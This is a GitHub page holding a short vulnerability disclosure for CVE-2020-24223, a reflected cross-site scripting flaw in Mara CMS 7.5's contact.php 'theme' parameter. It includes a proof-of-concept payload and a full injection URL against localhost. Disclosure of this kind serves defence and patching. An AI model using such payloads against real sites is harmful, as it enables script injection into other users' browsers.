Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/Mara CMS 7.5 - Cross Site Scripting
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
29 lines (19 sloc)
1.6 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ============================================================================================================================ | |
| | # Title : Mara CMS 7.5 Cross Site Scriping | | |
| | # Author : George Tsimpidas | | |
| | # Tested on : Kali Linux (X64) | | | |
| | # Vendor : https://sourceforge.net/projects/maracms/ | | |
| | # CVE : CVE-2020-24223 | | |
| ============================================================================================================================ | |
| Mara CMS 7.5 suffers from a Reflected Cross Site Scripting vulnerability. | |
| Description : | |
| This Reflected XSS vulnerability allows any authenticated user to | |
| inject malicious code via the parameter contact.php?theme=<inject>. | |
| The vulnerability exists because the parameter is not properly | |
| sanitized and this can lead to malicious code injection that will be | |
| executed on the target’s browser. | |
| PoC | |
| [+] Use Payload : seven69387';alert(1)//154 | |
| Path : http://localhost/contact.php?theme=< inject payload here> | |
| Full Path : | |
| http://localhost/contact.php?theme=seven69387';alert(1)//154 |